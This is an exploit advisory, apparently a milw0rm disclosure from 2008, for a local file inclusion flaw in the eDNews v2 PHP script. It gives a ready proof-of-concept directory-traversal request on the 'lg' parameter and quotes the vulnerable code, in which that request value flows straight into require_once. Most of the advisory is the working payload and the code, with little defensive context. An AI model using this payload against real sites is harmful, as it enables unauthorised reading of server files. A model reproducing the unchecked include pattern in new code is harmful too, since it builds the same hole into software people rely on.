eDNews v2 lg Local File Inclusion Vulnerability.pdf

1 _____ ____ __ __ _ ____ ____ ____ 2 |_ _| | _ \ \ \ / / / \ / ___| / ___| / ___| 3 | | | |_) | \ V / / _ \ | | _ | | | | 4 | | | _ < | | / ___ \ | |_| | _ | |___ | |___ 5 |_| |_| \_\ |_| /_/ \_\ \____| (_) \____| \____| 6 7 8 9 eDNews v2 (lg) Local File Inclusion Vulnerability 10 Script : http://www.mirrorservice.org/sites/download.sourceforge.net/pub/sourceforge/e/ed/edscontacts/eDNews_v2.zip 11 Poc : /eDNews_archive.php?lg=../../../../index 12 Vuln Code : 13 File eDNews_archive.php 14 15 require_once dirname( __FILE__ ).’/myConfig.php’;<< 1 16 require_once dirname( __FILE__ ).’/languages/’.$CONFIG[’language’].’.php’; << 2 17 18 File myConfig.php 19 20 if ( isset( $_REQUEST[’lg’] ) ) { 21 $CONFIG[’language’] = $_REQUEST[’lg’]; 22 23 ____ _ _ __ __ 24 / ___| ___ | | __| | | \/ | 25 | | _ / _ \ | | / _‘ | | |\/| | 26 | |_| | | (_) | | |___ | (_| | | | | | 27 \____| \___/ |_____| \__,_| _____ |_| |_| 28 |_____| 29 30 # milw0rm.com [2008−12−29] Page 1/1 eDNews v2 lg Local File Inclusion Vulnerability GoLd_M 12/29/2008